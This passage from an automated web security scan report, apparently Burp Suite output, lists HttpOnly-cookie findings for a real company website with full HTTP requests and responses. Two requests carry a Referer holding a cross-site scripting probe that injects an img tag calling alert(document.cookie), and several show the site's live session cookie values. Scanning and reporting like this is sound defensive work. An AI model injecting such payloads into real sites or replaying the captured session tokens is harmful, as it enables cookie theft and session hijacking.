Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/what-we-do-header.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/what-we-do-header.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:42 GMT
Server: Apache
Last-Modified: Fri, 07 Nov 2008 16:21:00 GMT
ETag: "10000000022fa-14fc5-45b1bcc85c5ea"
Accept-Ranges: bytes
Content-Length: 85957
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:07 GMT;path=/

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

2.24. http://www2.starcite.com/starcite/files/whitepapers_icon.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/files/whitepapers_icon.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/files/whitepapers_icon.png HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:31 GMT
Server: Apache
Last-Modified: Wed, 21 Apr 2010 19:20:49 GMT
ETag: "20000000031a5-199b-484c41778332b"
Accept-Ranges: bytes
Content-Length: 6555
Content-Type: image/png
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:57 GMT;path=/

...[SNIP]...

2.25. http://www2.starcite.com/starcite/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/home HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=45
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:32:59 GMT;path=/
Content-Length: 39445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--preload images
...[SNIP]...

2.26. http://www2.starcite.com/starcite/images/bg_btm1.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/bg_btm1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/bg_btm1.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:33 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:33:00 GMT
ETag: "100000000247f-d0-4579a43becb00"
Accept-Ranges: bytes
Content-Length: 208
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:59 GMT;path=/

...[SNIP]...

2.27. http://www2.starcite.com/starcite/images/bg_midtop.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/bg_midtop.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/bg_midtop.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:27 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:33:00 GMT
ETag: "1000000002481-1dd-4579a43becb00"
Accept-Ranges: bytes
Content-Length: 477
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:53 GMT;path=/

...[SNIP]...

2.28. http://www2.starcite.com/starcite/images/bg_midtop_extension.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/bg_midtop_extension.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/bg_midtop_extension.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:27 GMT
Server: Apache
Last-Modified: Thu, 11 Feb 2010 18:23:37 GMT
ETag: "1000000003157-56c-47f573fda5c40"
Accept-Ranges: bytes
Content-Length: 1388
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:53 GMT;path=/

...[SNIP]...

2.29. http://www2.starcite.com/starcite/images/content_left_bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/content_left_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/content_left_bg.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:27 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:33:00 GMT
ETag: "10000000024ac-bee-4579a43becb00"
Accept-Ranges: bytes
Content-Length: 3054
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:53 GMT;path=/

...[SNIP]...

2.30. http://www2.starcite.com/starcite/images/content_right_bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/content_right_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/content_right_bg.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:31 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:33:00 GMT
ETag: "10000000024ae-bfd-4579a43becb00"
Accept-Ranges: bytes
Content-Length: 3069
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:57 GMT;path=/

...[SNIP]...

2.31. http://www2.starcite.com/starcite/images/left_bdr.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/left_bdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/left_bdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:32 GMT
Server: Apache
Last-Modified: Wed, 13 Aug 2008 19:12:00 GMT
ETag: "10000000024e7-4d-4545c29b08000"
Accept-Ranges: bytes
Content-Length: 77
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:57 GMT;path=/


2.32. http://www2.starcite.com/starcite/images/right_bdr.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/right_bdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/right_bdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:32 GMT
Server: Apache
Last-Modified: Wed, 13 Aug 2008 19:12:00 GMT
ETag: "1000000002503-70-4545c29b08000"
Accept-Ranges: bytes
Content-Length: 112
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:57 GMT;path=/


2.33. http://www2.starcite.com/starcite/images/separator.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/separator.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/separator.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:22 GMT
Server: Apache
Last-Modified: Thu, 28 Aug 2008 01:20:00 GMT
ETag: "1000000002516-32e-4557aef89d000"
Accept-Ranges: bytes
Content-Length: 814
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:47 GMT;path=/

...[SNIP]...

2.34. http://www2.starcite.com/starcite/images/spacer.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/images/spacer.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:21 GMT
Server: Apache
Last-Modified: Wed, 13 Aug 2008 19:12:00 GMT
ETag: "1000000002518-2b-4545c29b08000"
Accept-Ranges: bytes
Content-Length: 43
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:47 GMT;path=/


2.35. http://www2.starcite.com/starcite/jobs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/jobs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/jobs HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:23 GMT;path=/
Content-Length: 17352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.36. http://www2.starcite.com/starcite/locations

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/locations

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/locations HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:00 GMT;path=/
Content-Length: 18662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.37. http://www2.starcite.com/starcite/misc/drupal.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/drupal.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/drupal.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:12 GMT
Server: Apache
Last-Modified: Mon, 16 Jul 2007 11:37:00 GMT
ETag: "1000000002556-1620-4355fe101cf00"
Accept-Ranges: bytes
Content-Length: 5664
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:37 GMT;path=/

// $Id: drupal.js,v 1.29.2.1 2007/07/15 23:07:06 drumm Exp $

var Drupal = Drupal || {};

/**
* Set the variable that indicates if JavaScript behaviors should be applied
*/
Drupal.jsEnabled = docume
...[SNIP]...

2.38. http://www2.starcite.com/starcite/misc/forms.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/forms.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/forms.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:26:06 GMT
Server: Apache
Last-Modified: Thu, 16 Apr 2009 21:02:12 GMT
ETag: "3000000002388-a90-467b260cdaa1f"
Accept-Ranges: bytes
Content-Length: 2704
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:32 GMT;path=/

/* ------------------------------------------------------

StarCite Forms
Dan Wilt, dan@enhancedinnovations.com

-------------------------------------------------------*/

/* ------------------
...[SNIP]...

2.39. http://www2.starcite.com/starcite/misc/jquery.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/jquery.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/jquery.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:35 GMT
Server: Apache
Last-Modified: Sun, 24 Dec 2006 10:16:00 GMT
ETag: "1000000002563-4b8c-42556f7b39800"
Accept-Ranges: bytes
Content-Length: 19340
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:00 GMT;path=/

// $Id: jquery.js,v 1.6 2006/12/23 21:46:35 dries Exp $
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/
...[SNIP]...

2.40. http://www2.starcite.com/starcite/misc/jquery/functions.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/jquery/functions.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/misc/jquery/functions.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:26:06 GMT
Server: Apache
Last-Modified: Thu, 16 Apr 2009 20:05:16 GMT
ETag: "200000000259b-16c9-467b195283319"
Accept-Ranges: bytes
Content-Length: 5833
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:32 GMT;path=/

$(document).ready(function(){
   
   // Cookie Stuff - Capture and Load.
   function cookieCapture() {
       $.cookie('sc_track_first_name', $('input[name=C_FirstName]').val(), { expires: 365, path: '/' });
...[SNIP]...

2.41. http://www2.starcite.com/starcite/misc/jquery/jquery-1.2.6.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
